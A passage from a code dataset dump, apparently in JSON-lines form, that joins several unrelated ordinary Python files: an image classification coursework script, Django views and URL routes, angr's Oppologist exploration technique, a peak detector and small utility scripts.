pca = PCA(n_components = top_dim)\n U, _, V = pca._fit(X)\n latent_features = U[:, :top_dim]\n\n # SVD\n elif dim_reduction_tech == \"2\":\n # U, _, V = np.linalg.svd(X)\n svd = TruncatedSVD(n_components=top_dim)\n U = svd.fit_transform(np.array(X))\n latent_features = U[:, :top_dim]\n\n # STORE THE SIMILARITY DICT IN H5py or pickle object beforehand\n # Find the similarity\n similarity_dict = {}\n lf_len = len(latent_features)\n # input_images += training_input_images\n\n for i in range(lf_len):\n for j in range(lf_len):\n if i == j:\n continue\n\n dist = euclidean_distance(list(latent_features[i]), list(latent_features[j]))\n sim = round((1 / (dist+1)), 4)\n # sim = cosine_similarity(list(latent_features[i]), list(latent_features[j]))\n img_sim = ImageSimilarity(input_images[j].image_id, sim)\n\n if input_images[i].image_id not in similarity_dict:\n similarity_dict[input_images[i].image_id] = [img_sim]\n else:\n similarity_dict[input_images[i].image_id].append(img_sim)\n\n # Sort the similarity graph (dictionary)\n for key, val in similarity_dict.items():\n similarity_dict[key] = sorted(val, key = lambda x: x.similarity, reverse = True)\n # chose the top k related images\n similarity_dict[key] = similarity_dict[key][:k]\n\n # Normalize the values to sum of 1\n\n\n # print the k similar images\n # for k,v in similarity_dict.items():\n # print('Image ID: ', k)\n # for i in v:\n # print(i.image_id, i.similarity)\n # print('\\n')\n\n return similarity_dict\n\n\ndef dimension_reduction_sift(X, k, selected_model, dim_reduction_tech, input_images):\n model = get_feature_model(selected_model)\n dim_reduction_model = get_dim_reduction_tech(dim_reduction_tech)\n\n top_dim = 50\n\n # PCA\n # if dim_reduction_tech == \"1\":\n # pca = PCA(n_components = top_dim)\n # X = np.array(X)\n # U = pca.fit_transform(X)\n # latent_features = U[:, :top_dim]\n #\n # # SVD\n # elif dim_reduction_tech == \"2\":\n # # U, _, V = np.linalg.svd(X)\n # svd = TruncatedSVD(n_components=top_dim)\n # U = svd.fit_transform(np.array(X))\n # latent_features = U[:, :top_dim]\n\n # STORE THE SIMILARITY DICT IN H5py or pickle object beforehand\n # Find the similarity\n similarity_dict = {}\n # lf_len = len(latent_features)\n # input_images += training_input_images\n\n bf = cv.BFMatcher()\n for i in range(len(input_images)):\n des1 = X[i]\n for j in range(len(input_images)):\n if input_images[i].image_id == input_images[j].image_id:\n continue\n\n des2 = X[j]\n matches = bf.knnMatch(des1, des2, k=2)\n good_count = 0\n for m, n in matches:\n # Apply ratio test\n if m.distance < 0.85 * n.distance:\n # good.append([m])\n good_count += 1\n\n img_sim = ImageSimilarity(input_images[j].image_id, good_count)\n\n if input_images[i].image_id not in similarity_dict:\n similarity_dict[input_images[i].image_id] = [img_sim]\n else:\n similarity_dict[input_images[i].image_id].append(img_sim)\n\n # Sort the similarity graph (dictionary)\n for key, val in similarity_dict.items():\n similarity_dict[key] = sorted(val, key=lambda x: x.similarity, reverse=True)\n # similarity_dict[key] = sorted(val, key = lambda x: x.similarity)\n # chose the top k related images\n similarity_dict[key] = similarity_dict[key][:k]\n\n return similarity_dict\n\n\n# Dimensionality reduction for Decision Tree Classifier\ndef reduce_dimensions_dt(X, k, dim_red_tech):\n\n if dim_red_tech == 1:\n pca = PCA(n_components=k)\n X_reduced = pca.fit_transform(X)\n return X_reduced\n elif dim_red_tech == 2:\n svd = TruncatedSVD(n_components=k)\n X_reduced = svd.fit_transform(np.array(X))\n return X_reduced\n\n\ndef ppr(similarity_dict, images, K):\n related_images = []\n weights = []\n personalize = []\n image_id_map = {}\n temp = 0\n for k, v in similarity_dict.items():\n image_id_map[k] = temp\n temp += 1\n\n for k, v in similarity_dict.items():\n found = False\n for j in images:\n if j.image_id == k:\n personalize.append(1/(len(images)))\n found = True\n break\n if not found :\n personalize.append(0)\n\n for i in v:\n edge = []\n edge.append(image_id_map[k])\n edge.append(image_id_map[i.image_id])\n related_images.append(edge)\n weights.append(i.similarity)\n # print('\\n')\n A = np.array(related_images)\n weights = np.array(weights)\n G = sparse.csr_matrix((weights, (A[:, 0], A[:, 1])), shape=(len(similarity_dict), len(similarity_dict)))\n personalize = np.array(personalize)\n # pr = pagerank.pagerank_power(G, p=0.85, personalize=personalize, tol=1e-6, max_iter=200)\n pr = pagerank.personalizedPageRank(G, personalize, c=0.15, allowedDiff=1e-9, maxIters=200)\n pr_sorted = np.argsort(pr)\n pr_sorted = pr_sorted[::-1]\n\n img_ppr = []\n # print('\\nPersonalized Page ranking are:\\n-------------------------------------------')\n\n for t in range(0, K):\n id = pr_sorted[t]\n score = pr[id]\n for image_id, node_id in image_id_map.items():\n if node_id == id:\n # no need to print score for the image\n # print('\\n')\n # print('Image ID ' + str(t + 1) + ': ' + image_id + ' : ' + str(score))\n\n # Store the information to display it using matplot\n temp = [image_id, score]\n img_ppr.append(temp)\n return img_ppr\n\n\ndef polynomial_kernel(x1,x2,p =3):\n return (1 + np.dot(x1, x2)) ** p\n\n\ndef rbf_kernel(x1,x2):\n return np.exp(-0.5*np.sum((x1-x2)**2))\n\n\ndef run_task():\n np.random.seed(81)\n\n # TODO: changing this will impact other classifiers so should be used with respect to classifier\n # selected_model = choose_feature_model()\n selected_model = \"1\"\n # dim_reduction_tech = choose_dim_reduction_tech()\n dim_reduction_tech = \"1\"\n classifier_type = choose_classifier()\n \n folder_path, dataset_type = input_data_set_folder_path(task=4)\n training_folder_path = input_data_set_folder_path(type='training')\n\n if dataset_type == 1:\n labelled_file = os.path.join(CURRENT_DIR, '..' + os.sep, 'Inputs' + os.sep + 'labelled_set1.csv')\n elif dataset_type == 2:\n labelled_file = os.path.join(CURRENT_DIR, '..' + os.sep, 'Inputs' + os.sep + 'labelled_set2.csv')\n elif dataset_type == 3:\n labelled_file = os.path.join(CURRENT_DIR, '..' + os.sep, 'Inputs' + os.sep + 'unlabelled_set1.csv')\n elif dataset_type == 4:\n labelled_file = os.path.join(CURRENT_DIR, '..' + os.sep, 'Inputs' + os.sep + 'unlabelled_set2.csv')\n\n print(\"\\nTraining the classifier...\")\n\n # TODO: add SVM classifier code\n if classifier_type == \"1\":\n dorsal_images, palmar_images = get_dorsal_palmar_images()\n test_image_feature_model = SIFT(training_folder_path)\n test_input_images = test_image_feature_model.get_data_set_files()\n test_feature_matrix = test_image_feature_model.extract_feature_feature_vectors2()\n\n label_image_feature_model = SIFT(folder_path)\n label_input_images = label_image_feature_model.get_data_set_files()\n feature_matrix = label_image_feature_model.extract_feature_feature_vectors2()\n model = get_feature_model(selected_model)\n top_dim = 50\n svd = TruncatedSVD(n_components=top_dim)\n svd.fit(np.array(feature_matrix))\n U = svd.transform(np.array(feature_matrix))\n latent_features = U[:, :top_dim]\n test_feature_matrix_reduced = svd.transform(np.array(test_feature_matrix))\n latent_features_unlabelled = test_feature_matrix_reduced[:,:top_dim]\n labels = []\n meta_deta = pd.read_csv(os.path.join(CURRENT_DIR, '..' + os.sep, 'Metadata', 'HandInfo.csv')) #This needs to change to take the input from the labelled set in the input folder\n\n test_labels = []\n for i in range(len(latent_features)):\n img_id = label_input_images[i].image_id\n aspect = meta_deta[meta_deta['imageName']=='Hand_'+img_id+'.jpg']['aspectOfHand'].iloc[0]\n if 'palmar' in aspect: #Palmar is 1 and Dorsal is -1\n labels.append(1)\n else:\n labels.append(-1)\n\n for i in range(len(test_input_images)):\n img_id = test_input_images[i].image_id\n aspect = meta_deta[meta_deta['imageName']=='Hand_'+img_id+'.jpg']['aspectOfHand'].iloc[0]\n if 'palmar' in aspect: #Palmar is 1 and Dorsal is -1\n test_labels.append(1)\n else:\n test_labels.append(-1)\n \n labels = np.array(labels)\n C = 10\n X = latent_features\n n = X.shape[0] #len(X)\n K = np.zeros((n, n))\n for i in range(n):\n for j in range(n):\n K[i][j] = labels[i] * labels[j] * polynomial_kernel(X[i], X[j])\n P = cvxopt_matrix(K)\n q = cvxopt_matrix(np.ones(n) * -1)\n A = labels.reshape((1, n))\n A = cvxopt_matrix(A.astype('double'))\n # A = matrix(y, (1, n), tc='d')\n b = cvxopt_matrix(0, tc='d')\n temp1 = np.identity(n) * -1\n temp2 = np.identity(n)\n G = cvxopt_matrix(np.vstack((temp1, temp2)))\n temp3 = cvxopt_matrix(np.zeros(n))\n temp4 = cvxopt_matrix(np.ones(n) * C)\n h = cvxopt_matrix(np.vstack((temp3, temp4)))\n cvxopt_solvers.options['show_progress'] = False\n solution = cvxopt_solvers.qp(P, q, G, h, A, b)\n alphas = np.array(solution['x']).reshape(n)\n support_vectors = np.where(alphas > 1e-7)[0][0]\n b = labels[support_vectors] - sum(alphas * labels * polynomial_kernel(X, X[support_vectors]))\n predict = np.zeros(len(latent_features_unlabelled))\n\n for i in range(len(latent_features_unlabelled)):\n asum = 0\n vector = latent_features_unlabelled[i]\n asum = sum(alphas*labels*polynomial_kernel(latent_features,vector)) + b\n predict[i] = np.sign(asum)\n results = predict\n \n tp = 0\n\n print(\"\\nLabeling unlabelled images...\")\n print(\"\\nImage ID : Label\")\n for i in range(len(results)):\n # if i <= 50 and results[i] == -1 :\n if results[i] == test_labels[i] :\n tp +=1\n # elif i > 50 and results[i] == 1 :\n # tp +=1\n img_id = test_input_images[i].image_id\n if results[i] == -1:\n print(img_id+ ' : Dorsal')\n elif results[i] == 1:\n print(img_id + ' : Palmar')\n \n print('\\nClassifier Accuracy: ' + str((tp / 100) * 100))\n\n #################################### DECISION TREE ##############################################\n elif classifier_type == \"2\":\n labelled_set = folder_path[-1]\n unlabelled_set = training_folder_path[-1]\n\n # INPUT FOLDERS & METADATAS\n labelled_folder_path = os.path.join(CURRENT_DIR, '..' + os.sep,\n 'Inputs', 'Labelled', 'Set' + labelled_set)\n labelled_metadata_path = os.path.join(CURRENT_DIR, '..' + os.sep,\n 'Inputs', 'labelled_set' + labelled_set + '.csv')\n labelled_metadata = pd.read_csv(labelled_metadata_path, index_col = \"id\")\n\n unlabelled_folder_path = os.path.join(CURRENT_DIR, '..' + os.sep,\n 'Inputs', 'Unlabelled', 'Set ' + unlabelled_set)\n\n # LABELLED\n\n print('Training Decision Tree Classifier ...')\n\n labelled_feature_model = FeatureModel(labelled_folder_path)\n labelled_images = labelled_feature_model.get_data_set_files()\n\n target = []\n\n for image in labelled_images:\n aspect = \\\n labelled_metadata[labelled_metadata['imageName'] == 'Hand_' + image.image_id + '.jpg'][\n 'aspectOfHand'].iloc[0]\n if 'palmar' in aspect:\n target.append(1)\n if 'dorsal' in aspect:\n target.append(0)\n\n labelled_feature_model = ColorMoment(labelled_folder_path)\n\n feature_matrix = labelled_feature_model.extract_feature_feature_vectors_list(labelled_images)\n\n X = np.array(feature_matrix)\n y = np.array(target)\n X_reduced = reduce_dimensions_dt(X, 20, 2)\n\n clf = DecisionTreeClassifier(max_depth = 5)\n clf.fit(X_reduced, y)\n\n print('Training Decision Tree Classifier ... DONE.')\n\n # UNLABELLED\n\n print('Classifying unlabelled images...')\n\n unlabelled_feature_model = FeatureModel(unlabelled_folder_path)\n unlabelled_images = unlabelled_feature_model.get_data_set_files()\n\n unlabelled_feature_model = ColorMoment(unlabelled_folder_path)\n\n unlabelled_feature_matrix = unlabelled_feature_model.extract_feature_feature_vectors_list(unlabelled_images)\n X_unlabelled = np.array(unlabelled_feature_matrix)\n X_unlabelled_reduced = reduce_dimensions_dt(X_unlabelled, 20, 2)\n\n predictions = clf.predict(X_unlabelled_reduced)\n aspect_dict = {}\n\n # Used to calculate accuracy of the classification\n dorsal_images, palmar_images = get_dorsal_palmar_images()\n hits = 0\n\n for image, prediction in zip(unlabelled_images, predictions):\n\n if prediction == 0:\n aspect_dict[image.image_id] = 'dorsal'\n if image.image_id in dorsal_images:\n hits += 1\n else:\n aspect_dict[image.image_id] = 'palmar'\n if image.image_id in palmar_images:\n hits += 1\n\n print(f'{image.image_id} : {aspect_dict[image.image_id]}')\n\n print('Classifying unlabelled images... DONE.')\n\n accuracy = (hits / len(unlabelled_images)) * 100\n print(f'\\nAccuracy = {accuracy}%')\n\n OUTPUT_PATH = os.path.join(OUTPUT_DIR,\n 'DT_labelledset' + labelled_set +\n '_unlabelledset' + unlabelled_set +\n '.csv')\n\n with open(OUTPUT_PATH, 'w', newline = \"\") as csv_file:\n writer = csv.writer(csv_file)\n for key, value in aspect_dict.items():\n writer.writerow([key, value])\n\n print('(ImageID,AspectOfHand) info saved in file - ', OUTPUT_PATH)\n\n # PPR based classifier code\n elif classifier_type == \"3\":\n # k = int(input('Enter the value of k (outgoing edges): '))\n # for cm + pca\n # k = 12\n k = 18\n lsh_index = lsh.LSHIndex(load_sift=True)\n\n if selected_model == \"1\":\n unlabelled_image_feature_model = ColorMoment(training_folder_path)\n unlabelled_input_images = unlabelled_image_feature_model.get_data_set_files()\n unlabelled_feature_matrix = unlabelled_image_feature_model.extract_feature_feature_vectors()\n\n # Dorsal\n dor_image_feature_model = ColorMoment(folder_path, image_label=ImageLabel.DORSAL,\n labelled_file=labelled_file)\n dor_input_images = dor_image_feature_model.get_data_set_files()\n dor_feature_matrix = dor_image_feature_model.extract_feature_feature_vectors()\n # we have combined features matrix with dorsal, palmar, and ulabelled, so no longer used\n X1 = np.array(dor_feature_matrix + unlabelled_feature_matrix)\n # similarity_dict_dor = dimension_reduction(X1, k, selected_model, dim_reduction_tech,\n # dor_input_images, training_input_images)\n\n # Palmar\n palm_image_feature_model = ColorMoment(folder_path, image_label=ImageLabel.PALMAR,\n labelled_file=labelled_file)\n palm_input_images = palm_image_feature_model.get_data_set_files()\n palm_feature_matrix = palm_image_feature_model.extract_feature_feature_vectors()\n # we have combined features matrix with dorsal, palmar, and ulabelled, so no longer used\n X2 = np.array(palm_feature_matrix + unlabelled_feature_matrix)\n # similarity_dict_palm = dimension_reduction(X2, k, selected_model, dim_reduction_tech,\n # palm_input_images,\n # training_input_images)\n\n X = np.array(dor_feature_matrix + palm_feature_matrix + unlabelled_feature_matrix)\n all_images = dor_input_images + palm_input_images + unlabelled_input_images\n # similarity_dict = dimension_reduction(X, k, selected_model, dim_reduction_tech, all_images)\n\n # Using SIFT to find similarity graph before creating the PPR graph\n all_image_features = []\n for image in all_images:\n img_id = image.image_id\n img_feature = []\n img_index = lsh_index.image_id_map[img_id]\n start_point = lsh_index.data_sift_kp_starts[img_index]\n if img_index > len(lsh_index.data_sift_kp_starts):\n img_feature = lsh_index.data_sift[start_point:]\n all_image_features.append(img_feature)\n else:\n end_point = lsh_index.data_sift_kp_starts[img_index + 1]\n img_feature = lsh_index.data_sift[start_point:end_point]\n all_image_features.append(img_feature)\n similarity_dict = dimension_reduction_sift(all_image_features, k, selected_model, dim_reduction_tech,\n all_images)\n # SIFT ends\n\n # PPR\n # print(len(X1))\n dor_img_ppr = ppr(similarity_dict, dor_input_images, len(X))\n palm_img_ppr = ppr(similarity_dict, palm_input_images, len(X))\n\n print(\"\\nLabeling unlabelled images...\")\n print(\"\\nImage ID : Label\")\n dor_score, palm_score = 0, 0\n tp = 0\n # Used to calculate accuracy of the classification\n dorsal_images, palmar_images = get_dorsal_palmar_images()\n\n for i in unlabelled_input_images:\n for j in range(len(dor_img_ppr)):\n if dor_img_ppr[j][0] == i.image_id:\n # dor_score = dor_img_ppr[j][1]\n dor_score = j\n break\n\n for j in range(len(palm_img_ppr)):\n if palm_img_ppr[j][0] == i.image_id:\n # palm_score = palm_img_ppr[j][1]\n palm_score = j\n break\n\n # if dor_score > palm_score:\n if dor_score < palm_score:\n print(i.image_id + ' : Dorsal')\n # check for true positive\n if i.image_id in dorsal_images:\n tp += 1\n else:\n print(i.image_id + ' : Palmar')\n # check for true positive\n if i.image_id in palmar_images:\n tp += 1\n\n print('\\nClassifier Accuracy: ' + str((tp / 100) * 100))\n\n elif selected_model == \"3\":\n unlabelled_image_feature_model = HOG(training_folder_path)\n unlabelled_input_images = unlabelled_image_feature_model.get_data_set_files()\n unlabelled_feature_matrix = unlabelled_image_feature_model.extract_feature_feature_vectors()\n\n # Dorsal\n dor_image_feature_model = HOG(folder_path, image_label=ImageLabel.DORSAL,\n labelled_file=labelled_file)\n dor_input_images = dor_image_feature_model.get_data_set_files()\n dor_feature_matrix = dor_image_feature_model.extract_feature_feature_vectors()\n # we have combined features matrix with dorsal, palmar, and ulabelled, so no longer used\n X1 = np.array(dor_feature_matrix + unlabelled_feature_matrix)\n # similarity_dict_dor = dimension_reduction(X1, k, selected_model, dim_reduction_tech,\n # dor_input_images, training_input_images)\n\n # Palmar\n palm_image_feature_model = HOG(folder_path, image_label=ImageLabel.PALMAR,\n labelled_file=labelled_file)\n palm_input_images = palm_image_feature_model.get_data_set_files()\n palm_feature_matrix = palm_image_feature_model.extract_feature_feature_vectors()\n # we have combined features matrix with dorsal, palmar, and ulabelled, so no longer used\n X2 = np.array(palm_feature_matrix + unlabelled_feature_matrix)\n # similarity_dict_palm = dimension_reduction(X2, k, selected_model, dim_reduction_tech,\n # palm_input_images,\n # training_input_images)\n\n X = np.array(dor_feature_matrix + palm_feature_matrix + unlabelled_feature_matrix)\n all_images = dor_input_images + palm_input_images + unlabelled_input_images\n similarity_dict = dimension_reduction(X, k, selected_model, dim_reduction_tech, all_images)\n\n # PPR\n # print(len(X1))\n dor_img_ppr = ppr(similarity_dict, dor_input_images, len(X))\n palm_img_ppr = ppr(similarity_dict, palm_input_images, len(X))\n\n print(\"\\nLabeling unlabelled images...\")\n print(\"\\nImage ID : Label\")\n dor_score, palm_score = 0, 0\n tp = 0\n # Used to calculate accuracy of the classification\n dorsal_images, palmar_images = get_dorsal_palmar_images()\n\n for i in unlabelled_input_images:\n for j in range(len(dor_img_ppr)):\n if dor_img_ppr[j][0] == i.image_id:\n # dor_score = dor_img_ppr[j][1]\n dor_score = j\n break\n\n for j in range(len(palm_img_ppr)):\n if palm_img_ppr[j][0] == i.image_id:\n # palm_score = palm_img_ppr[j][1]\n palm_score = j\n break\n\n # if dor_score > palm_score:\n if dor_score < palm_score:\n print(i.image_id + ' : Dorsal')\n # check for true positive\n if i.image_id in dorsal_images:\n tp += 1\n else:\n print(i.image_id + ' : Palmar')\n # check for true positive\n if i.image_id in palmar_images:\n tp += 1\n\n print('\\nClassifier Accuracy: ' + str((tp / 100) * 100))\n\n\nif __name__ == \"__main__\":\n run_task()","sub_path":"Code/task4.py","file_name":"task4.py","file_ext":"py","file_size_in_byte":29578,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"44"} +{"seq_id":"394553993","text":"#!/usr/bin/env python\n\"\"\"\n\"\"\"\nfrom optparse import OptionParser\nimport json\n\n\ndef convert_to_txt(inpath, indir, outpath):\n with open(outpath, \"w\") as of:\n of.write(\"Reading inpath...\\n\")\n of.write(\"inpath: %s\\n\"%(inpath,))\n of.write(\"indir: %s\\n\"%(indir,))\n with open(inpath, \"r\") as json_file:\n data = json.load(json_file)\n files = data[\"files\"]\n of.write(\"files:\\n\")\n for f in files:\n of.write(\"%s\\n\"%(f[\"basename\"]))\n parts = data[\"parts\"]\n of.write(\"\\n\")\n of.write(\"parts:\\n\")\n for name in parts:\n part = parts[name]\n of.write(\"reads %s mapping %s\\n\"%(part[\"reads\"], part[\"mapping\"]))\n\n \nif __name__ == \"__main__\":\n \"\"\"\n \"\"\"\n parser = OptionParser(usage=__doc__, version=\"%prog 0.01\")\n parser.add_option(\"-o\",\"--outpath\",dest=\"outpath\",\n help=\"output file path\", default = 'fakeped')\n parser.add_option(\"-p\",\"--indir\",dest=\"indir\",\n help=\"path for input files\", default = './')\n parser.add_option(\"-i\", \"--inpath\", dest=\"inpath\",\n help=\"path for input primary file\", default=\"./\")\n (options,args) = parser.parse_args()\n convert_to_txt(options.inpath, options.indir, options.outpath)\n\n\n \n","sub_path":"tools/globus/read_cga_dataset.py","file_name":"read_cga_dataset.py","file_ext":"py","file_size_in_byte":1316,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"44"} +{"seq_id":"528755182","text":"import pyvex\nimport claripy\nimport simuvex\nimport functools\n\nimport logging\nl = logging.getLogger(\"angr.exploration_techniques.Oppologist\")\n\nfrom ..errors import AngrError\nexc_list = (AngrError, simuvex.SimError, claripy.ClaripyError, TypeError, ValueError, ArithmeticError, MemoryError)\n\nfrom . import ExplorationTechnique\nclass Oppologist(ExplorationTechnique):\n \"\"\"\n The Oppologist is an exploration technique that forces uncooperative code through qemu.\n \"\"\"\n\n def __init__(self):\n ExplorationTechnique.__init__(self)\n\n @staticmethod\n def _restore_path(old, new):\n new.state.release_plugin('unicorn')\n new.state.register_plugin('unicorn', old.state.unicorn.copy())\n new.state.options = set(old.state.options)\n return new\n\n def _oppologize(self, p, pn, **kwargs):\n l.debug(\"... pn: %s\", pn)\n\n irsb = self.project.factory.block(pn.addr).vex\n addrs = [ s.addr for s in irsb.statements if isinstance(s, pyvex.IRStmt.IMark) ]\n if len(addrs) > 1:\n stops = [ addrs[1] ]\n else:\n stops = None\n\n pn.state.options.add(simuvex.options.UNICORN)\n pn.state.options.add(simuvex.options.UNICORN_AGGRESSIVE_CONCRETIZATION)\n pn.state.unicorn.max_steps = 1\n pn.state.unicorn.countdown_symbolic_registers = 0\n pn.state.unicorn.countdown_symbolic_memory = 0\n pn.state.unicorn.countdown_nonunicorn_blocks = 0\n pn.step(extra_stop_points=stops, throw=True, **kwargs)\n\n fixup = functools.partial(self._restore_path, p)\n\n l.debug(\"... successors: %s\", pn.successors)\n\n return (\n map(fixup, [ pp for pp in pn.successors if not pp.errored ]),\n map(fixup, pn.unconstrained_successors),\n map(fixup, pn.unsat_successors),\n [ ], # pruned\n map(fixup, [ pp for pp in pn.successors if pp.errored ]), #errored\n )\n\n @staticmethod\n def _combine_results(*results):\n all_successors = [ ]\n all_unconstrained = [ ]\n all_unsat = [ ]\n all_pruned = [ ]\n all_errored = [ ]\n\n for s,uc,us,p,e in results:\n all_successors.extend(s)\n all_unconstrained.extend(uc)\n all_unsat.extend(us)\n all_pruned.extend(p)\n all_errored.extend(e)\n\n return (\n all_successors,\n all_unconstrained,\n all_unsat,\n all_pruned,\n all_errored\n )\n\n def _delayed_oppology(self, p, e, **kwargs):\n try:\n p.step(num_inst=e.executed_instruction_count, throw=True, **kwargs)\n except Exception: #pylint:disable=broad-except\n return [], [], [], [], p.step(num_inst=e.executed_instruction_count, **kwargs)\n\n need_oppologizing = [ pp for pp in p.successors if pp.addr == e.ins_addr ]\n results = [ (\n [ pp for pp in p.successors if pp.addr != e.ins_addr ],\n p.unconstrained_successors,\n p.unsat_successors,\n [ ],\n [ ]\n ) ]\n\n results += map(functools.partial(self._oppologize, p, **kwargs), need_oppologizing)\n return self._combine_results(*results)\n\n def step_path(self, p, **kwargs):\n try:\n p.step(throw=True, **kwargs)\n return None\n except (simuvex.SimUnsupportedError, simuvex.SimCCallError) as e:\n l.debug(\"Errored on path %s after %d instructions\", p, e.executed_instruction_count)\n try:\n if e.executed_instruction_count:\n return self._delayed_oppology(p, e, **kwargs)\n else:\n return self._oppologize(p, p.copy(), **kwargs)\n except exc_list: #pylint:disable=broad-except\n l.error(\"Oppologizer hit an error.\", exc_info=True)\n return None\n except exc_list: #pylint:disable=broad-except\n l.error(\"Original block hit an error.\", exc_info=True)\n return None\n","sub_path":"angr/exploration_techniques/oppologist.py","file_name":"oppologist.py","file_ext":"py","file_size_in_byte":4017,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"44"} +{"seq_id":"650974380","text":"from django.shortcuts import render\n\n# Create your views here.\nfrom django.http import HttpResponse\nfrom django.shortcuts import render\nfrom .models import Comment20200904\nfrom .models import Pid8F332Caa60\nimport time\n\nbrands_dic = {\n \"PHILIPS\": 0,\n \"MI\": 0,\n \"SONY\": 0,\n \"HUAWEI\": 0,\n \"Haier\": 0,\n \"Apple\": 0,\n \"SAMSUNG\": 0,\n \"Lenovo\": 0,\n \"HP\": 0,\n \"ASUS\": 0,\n \"Hisense\": 0,\n \"TCL\": 0,\n \"HONOR\": 0,\n \"KONKA\": 0,\n \"GREE\": 0,\n \"CHANGHONG\": 0,\n \"YOUPIN\": 0,\n \"LG\": 0,\n \"Redmi\": 0,\n \"MEIZU\": 0,\n \"RAZER\": 0,\n \"Microsoft\": 0,\n \"Hasee\": 0,\n \"360\": 0,\n \"OPPO\": 0,\n \"vivo\": 0,\n \"BenQ\": 0,\n \"SHARP\": 0,\n \"ZMI\": 0,\n \"ROG\": 0,\n \"other\": 0,\n}\n\n\n\ndef index(request):\n # return HttpResponse(\"Hello Django!\")\n return render(request,'index.html')\n\n\ndef show_today(request):\n n = Comment20200904.objects.all()\n now_day = time.strftime(\"%Y-%m-%d\", time.localtime())\n count = len(n)\n comment_sum = 0\n phone_count_max = 0\n for phone in n:\n comment_sum += int(phone.comment_count)\n\n for key in brands_dic.keys():\n if phone.product_name.find(key) > 0 :\n brands_dic[key] += 1\n break\n else:\n brands_dic['other'] += 1\n\n tmp = brands_dic.copy()\n for key,value in tmp.items():\n if value == 0:\n brands_dic.pop(key)\n continue\n if value > phone_count_max:\n phone_count_max = value\n # print(phone_count_max,brands_dic)\n barnds_list = list(brands_dic.keys())\n barnds_count_list = list(brands_dic.values())\n\n return render(request,'dayshow.html',locals())\n\n\ndef show_product(request):\n\n product_comments = Pid8F332Caa60.objects.all()\n negative_count = 0\n positive_count = 0\n for product_comment in product_comments:\n if float(product_comment.emotional_value) >= 0.5 :\n positive_count += 1\n else:\n negative_count += 1\n positive_proportion = (round(positive_count /(positive_count + negative_count) * 100))\n count = len(product_comments)\n return render(request,'productshow.html',locals())","sub_path":"week10/MyDjango/phone/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2171,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"44"} +{"seq_id":"592864382","text":"from django.conf.urls import patterns, include\n\nfrom django.contrib import admin\nadmin.autodiscover()\n\nurlpatterns = patterns('',\n # Examples:\n # url(r'^$', 'we.views.home', name='home'),\n # url(r'^blog/', include('blog.urls')),\n (r'^([^/]+/)?common/', include('common.urls')),\n (r'^www/', include('apps.www.urls', namespace='www')),\n (r'^mirror/', include('apps.mirror.urls', namespace='mirror')),\n (r'^genuine/', include('apps.genuine.urls', namespace='genuine')),\n (r'^file/', include('apps.file.urls', namespace='file')),\n (r'^iptv/', include('apps.iptv.urls', namespace='iptv')),\n (r'^open/', include('apps.open.urls', namespace='open')),\n\n (r'^me/', include('apps.me.urls', namespace='me')),\n\n (r'^admin/', include(admin.site.urls)),\n)\n","sub_path":"we/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":778,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"44"} +{"seq_id":"221642288","text":"# 判断某一个时间序列是不是双重触发的先验模型\n\nimport matplotlib.pyplot as plt\nfrom scipy import signal\nfrom numpy import *\n\n\ndef is_double_trigger(data):\n peak, _ = signal.find_peaks(data, height=30, distance=50)\n if len(peak) == 2:\n return True\n else:\n return False\n\n\nif __name__ == '__main__':\n A, X, Z = [], [], []\n filepath = 'C:\\\\Users\\\\Dell\\\\Desktop\\\\标注结果\\\\第三次标注:202\\\\double_trigger_0-4679.txt'\n with open(file=filepath, mode='r+', encoding='utf-8') as f:\n lines = f.readlines()\n point = 0\n for line in lines:\n value = [str(s) for s in line.split('\\t')]\n X.append(value[0])\n Z_temp = value[1].split(',')\n z = []\n for num in Z_temp:\n z.append(float(num))\n Z.append(z)\n f.close()\n num = 0\n for i in range(len(Z)):\n if is_double_trigger(Z[i]):\n num += 1\n print(num)\n print(len(Z))\n\n# l = len(X)\n# for j in range(l):\n# plt.plot(Z[j], \"k-\", alpha=.3)\n# plt.tight_layout()\n# plt.show()\n#\n y = Z[1]\n peaks, _ = signal.find_peaks(y, height=30, distance=50)\n plt.figure(figsize=(10, 5))\n plt.plot(y)\n for i in range(len(peaks)):\n plt.plot(peaks[i], y[peaks[i]], '.', markersize=10)\n plt.show()\n","sub_path":"double_trigger.py","file_name":"double_trigger.py","file_ext":"py","file_size_in_byte":1328,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"44"} +{"seq_id":"586274191","text":"\n\n\n\n\n\ndef main():\n file = input(\"Give me a file name: \")\n inputFile = open(file, \"r\")\n \n s = inputFile.readline()\n \n sequence = []\n for v in range (6): \n a = inputFile.readline()\n list= [a]\n sequence = sequence + list\n \n for m in range(6): \n k = sequence[m]\n smallesterrors = len(s) + 10\n bestposition = 0\n for i in range(0,len(s)-len(k)): \n errors = 0\n for j in range(len(k)-2): \n if s[i+j] != k[j%len(k):(j+1)%len(k)]:\n errors = errors + 1\n if errors < smallesterrors: \n smallesterrors = errors\n bestposition = i\n print(\"Sequence\", m+1, \"has\",smallesterrors, \"errors at position\", bestposition)\n \nmain()","sub_path":"testFiles/match/match70.py","file_name":"match70.py","file_ext":"py","file_size_in_byte":810,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"44"} +{"seq_id":"70509745","text":"'''\nCreated on Feb 27, 2014\n\n@author: miguel\n'''\ndef drawMap(routeList):\n paintRoute=\"\";\n noDuplirouteList= set(routeList)\n for route in noDuplirouteList:\n paintRoute+=route.origin+\"-\"+route.dest+\",\"\n import webbrowser\n webbrowser.open('http://www.gcmap.com/mapui?P='+paintRoute) ","sub_path":"Assignment2.1/src/csAir/DrawMap.py","file_name":"DrawMap.py","file_ext":"py","file_size_in_byte":326,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"44"} +{"seq_id":"502755992","text":"from __future__ import absolute_import, division, print_function\nimport inspect\nimport sys\nfrom builtins import (str)\nfrom terraform_validator.custom_rules.BaseRule import BaseRule\n\n\ndef lineno():\n \"\"\"Returns the current line number in our program.\"\"\"\n return str(' - SnsTopicPolicyNotPrincipalRule - caller: ' + str(inspect.stack()[1][3]) + ' - line number: ' + str(\n 